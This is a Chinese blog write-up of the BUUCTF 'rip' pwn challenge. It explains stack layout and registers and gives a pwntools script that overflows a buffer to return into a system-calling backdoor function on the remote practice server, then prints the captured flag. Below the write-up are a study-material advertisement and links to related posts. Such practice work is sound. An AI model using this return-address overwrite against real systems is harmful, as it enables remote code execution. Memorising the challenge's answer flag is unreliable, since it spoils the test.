【CTF】rip--堆栈的简单认识_ctf rip

于 2024-05-13 09:43:42 发布
阅读量447 收藏 10
点赞数 5
分类专栏: 程序员 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968582/article/details/138787356
版权

命令执行函数就是fun()方法,调用system函数,可以远控服务器

在这里插入图片描述

fun()的地址为0x401186,只要使栈溢出,使return返回的是fun()的地址,就能触发命令执行

在这里插入图片描述

栈溢出和堆溢出是两种不同的情况,以下是对栈和堆的简单区分:

  • stack(栈)由操作系统自动分配释放 ,用于存放函数的参数值、局部变量等
  • Heap负责存储动态分配的内存空间,如c语言中的malloc/free分配内存时,就会分配到Heap区域

在这里插入图片描述

64位CPU对应寄存器
● RSP(栈顶,低地址)
● RBP(栈底,高地址)
● RIP(当前栈栈帧执行的命令)
32位CPU对应寄存器
● ESP(栈顶)
● EBP(栈底)
● EIP(当前栈栈帧执行的命令)

结合图可以看出,Stack(栈)先进后出(从高地址往低地址开辟内存空间),Heap(堆)先进先出的特点(从低地址往高地址开辟内存空间),中间的shared libraries是堆和栈是共享的一片内存空间

先写出payload:

from pwn import \*;

p =remote('node5.buuoj.cn',27090)
payload = b'C'\*15 + b'D'\*8 + p64(0x401186+1)
p.sendline(payload);
p.interactive()

整个payload意图就是导致栈溢出到指定位置,再传入fun()的地址0x401186就能导致命令执行,+1则是为了维持堆栈平衡,这个在本地是不需要的,在远程服务器则需要。
至此,我们就能连接远程服务器,cat flag

在这里插入图片描述

flag{ab21f884-ecef-4f2a-88fa-70d7b0b96549}

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84968582
关注
专栏目录
CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3
arttnba3的博客
02-25 5803
CTF资料-0x0002】简易Linux堆利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1)
m0_61330806的博客
04-07 632
这个页面按下F5,反汇编为伪代码看到关键函数system()点进去看一下,是不是我们要的那种。双击那个system(a)好极了,就是这个。再来看一下变量command是如何传进去的,左上角箭头,回到历史记录再分析一下程序,用户的输入被存到了变量a中,a经过fun函数后,传入system函数执行,也就是说,command就是a,也就是用户的输入。再双击fun看一下,有没有特殊处理经典的字符串倒置代码,也就是说,它会把你的输入倒过来,即ls->sl ,cat flag->galf tac。
ctf.rip:CTF.RIP Jekyll静态网站
04-04
ctf.rip-来自捕获赃物的CTF编写 此存储库包含ctf.rip网站的Jekyll源,该源通过构建Jekyll站点,然后将生成的_site/路径部署到_site/进行部署。 生产网址: : 要添加帖子: 将新的markdown文件添加到_posts/ 用jekyll build 部署: 切换到_site/文件夹 使用netlify deploy进行netlify deploy 网站信息: 主题: 主持人: 作者: 克里斯·亨特( )
CTFrip--堆栈简单认识
网络安全从业者的学习笔记
04-08 547
BUUCTF-rip解题思路
CTF buuoj pwn-----第2题:rip
bing_Max的博客
08-28 2965
CTF buuoj pwn-----第2题:rip 记录一下pwn的过程 同第1题一样,新手学习日记,流水线记录. 打开题目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
函数调用时栈空间的变化
欢迎来到神林的博客
08-22 867
在函数调用的时候会内存分配给函数一段栈内存用于存放数据。 函数初次调用分配 1 ESP指针指向栈顶 EBP指向栈底,栈底属于高位地址,每次存入数据由栈顶来进行储存。 2 调用函数,EIP设定前一个函数结束,ESP所指地址存入EBP位置,此时ESP=EBP 3 ESP自动分配空间 ESP-0xch位置,同时进行下一次的存储。此时函数调用成功。 函数调用退栈 1 ESP=EBP 此时调用下一个函数,先...
函数调用栈的过程与函数调用约定(学习笔记)
BoyBubble的博客
12-07 1352
视频资料栈介绍 - CTF Wiki通过以上资料理解栈帧(stack frame)的概念。
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1589
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2593
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
171009 逆向-实验吧ctf(250re-apk)
whklhhhh的博客
10-10 1233
1625-5 王子昂 总结《2017年10月9日》 【连续第374天总结】 A. 实验吧ctf-re B. android这个题目的分数并不高,但是由于安卓版本问题真是问题频发…… 直接打开程序发现是空荡荡的页面 对APK反编译,发现设置了一个Send_to_Activity广播接收函数 当收到”msg”:”OpenSesame”的广播时设置CTFRevceiver 那我们就用adb
[每日一PWN]BUUCTF RIP
qq_55233040的博客
11-19 278
比赛隐身,反思结束,从头详细记录一下,每日记录一题,第一题的nc就不用记了,所以直接从第二题rip开始。
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2582
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
pwn学习(3)BUUCTF-rip(函数知识/缓冲区溢出)
m0_66039322的博客
09-21 807
1.函数调用栈是指程序运行时内存一段连续的区域。(特殊的内存)2.用来保存函数运行时的状态信息,包括函数参数与局部变量等。3.称之为‘栈’是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。4.在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态5.函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。
BUUCTF|rip
cm_zl
04-30 2175
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 5205
BUU CTF PWN 入门知识详解
CTF PWN练习之函数指针改写
2201_75571291的博客
07-26 125
使用objdump工具可以查看一个目标文件的许多内部信息,objdump有许多可选的参数选项,通过控制这些参数选项可以输出不同的文件信息。本实验的程序和代码位于/home/test/4目录下,执行objdump -d pwn4可以看到关于pwn4程序的反汇编指令列表,其中-d选项表示进行反汇编操作.本文涉及相关实验:[《CTFPWN练习之函数指针改写》](https://www.hetianlab.com/expc.do?
BUUCTF刷题之路-rip1
qq_30528603的博客
05-25 1578
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出题目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
pwn | BUUCTF rip 1&& pwn基本思路
最新发布
Mintind的博客
04-26 1566
(写得好详细我好爱(为什么payload有两种写法于。
CTF PWN基础知识(寄存器、栈、汇编指令、标志位)详解
weixin_43780092的博客
09-04 5940
本文详解PWN中基础知识,文中寄存器缩写都有标注上中文含义,方便初学者理解记忆。
ctf杂项题:easy-nbt
资源摘要信息:"CTF杂项题:easy-nbt" 知识点: 1. CTF(Capture The Flag)介绍 CTF是一种信息安全竞赛,通常包括多种类型的问题和挑战,目的是考验参赛者的各种技能,如逆向工程、密码学、二进制分析、Web安全、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值